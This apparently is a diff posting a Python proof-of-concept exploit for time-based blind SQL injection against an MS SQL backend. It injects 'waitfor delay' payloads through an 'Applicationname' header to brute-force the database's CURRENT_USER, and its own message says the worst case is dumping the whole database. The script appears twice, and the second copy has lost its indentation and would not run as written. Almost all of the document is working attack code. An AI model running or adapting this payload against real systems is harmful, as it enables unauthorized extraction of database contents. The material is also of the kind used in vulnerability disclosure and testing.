krnbhargav · April 10, 2024 15:22
diff --git a/exploit.py b/exploit.py
 #!/usr/bin/env python3
 from httpx import *
 from sys import exit
 import string

 client =Client(base_url='<url>',cookies={"<name1>":"<value1>"},follow_redirects=False) 
 api = '<endpoint>'
 temp_json = json={"<field1>":"<field2>"}

 def dumplength(l):
    '''function to find the length of CURRENT_USER'''
    payload = f"; if (LEN(CURRENT_USER) = {l}) waitfor delay '0:0:5' --" 
    try:
        r=client.post(api,headers={'Applicationname':payload},json=temp_json)
        if r.status_code== 200:
            timetook = r.elapsed.total_seconds()
            if(timetook >= 5):
                return True
        else:
            print('[!] status code != 200')  
    except Exception as e:
        print(e)
    return False

 def dumpusername(i,c):
    '''function to dump length of CURRENT_USER'''
    payload = f"; if (SUBSTRING((SELECT CURRENT_USER),{i},1) = '{c}') waitfor delay '0:0:5' --" 
    try:
        r=client.post(api,headers={'Applicationname':payload},json=temp_json)
        if r.status_code== 200:
            timetook = r.elapsed.total_seconds()
            if(timetook >= 5):
                return True
        else:
            print('[!] status code != 200')  
    except Exception as e:
        print(e)
    return False
 if __name__ == '__main__':
    print("""[!] This script is only for POC purpose,\nThere is no limit to what attacker can do\nWorst case scenerio is dumping whole database.""")
    print("[*] Finding the length of current user of database")
    l = 0
    i = 0
    while True:
        try:
            if(dumplength(i)):
                l = i
                print(f'[+] Found length of CURRENT_USER : {l}')
            else:
                i+=1
        except KeyboardInterrupt as e:
            break
    i = 1 
    result = ""
    character_to_bruteforce ="-_. " + string.ascii_letters + string.digits
    if (l != 0):
        print("[*] Dumping username")
        while (i<=l):
            try:
                for c in character_to_bruteforce:
                    if(dumpusername(i,c)):
                        result+=c
                        i+=1
                        print(f'[*] Found : {result}')
                        continue
            except KeyboardInterrupt as e:
                client.close()
                break
        client.close()
    else:
        client.close()
        exit(0)
	#!/usr/bin/env python3
	from httpx import *
	from sys import exit
	import string

	client =Client(base_url='<url>',cookies={"<name1>":"<value1>"},follow_redirects=False)
	api = '<endpoint>'
	temp_json = json={"<field1>":"<field2>"}

	def dumplength(l):
	'''function to find the length of CURRENT_USER'''
	payload = f"; if (LEN(CURRENT_USER) = {l}) waitfor delay '0:0:5' --"
	try:
	r=client.post(api,headers={'Applicationname':payload},json=temp_json)
	if r.status_code== 200:
	timetook = r.elapsed.total_seconds()
	if(timetook >= 5):
	return True
	else:
	print('[!] status code != 200')
	except Exception as e:
	print(e)
	return False

	def dumpusername(i,c):
	'''function to dump length of CURRENT_USER'''
	payload = f"; if (SUBSTRING((SELECT CURRENT_USER),{i},1) = '{c}') waitfor delay '0:0:5' --"
	try:
	r=client.post(api,headers={'Applicationname':payload},json=temp_json)
	if r.status_code== 200:
	timetook = r.elapsed.total_seconds()
	if(timetook >= 5):
	return True
	else:
	print('[!] status code != 200')
	except Exception as e:
	print(e)
	return False
	if __name__ == '__main__':
	print("""[!] This script is only for POC purpose,\nThere is no limit to what attacker can do\nWorst case scenerio is dumping whole database.""")
	print("[*] Finding the length of current user of database")
	l = 0
	i = 0
	while True:
	try:
	if(dumplength(i)):
	l = i
	print(f'[+] Found length of CURRENT_USER : {l}')
	else:
	i+=1
	except KeyboardInterrupt as e:
	break
	i = 1
	result = ""
	character_to_bruteforce ="-_. " + string.ascii_letters + string.digits
	if (l != 0):
	print("[*] Dumping username")
	while (i<=l):
	try:
	for c in character_to_bruteforce:
	if(dumpusername(i,c)):
	result+=c
	i+=1
	print(f'[*] Found : {result}')
	continue
	except KeyboardInterrupt as e:
	client.close()
	break
	client.close()
	else:
	client.close()
	exit(0)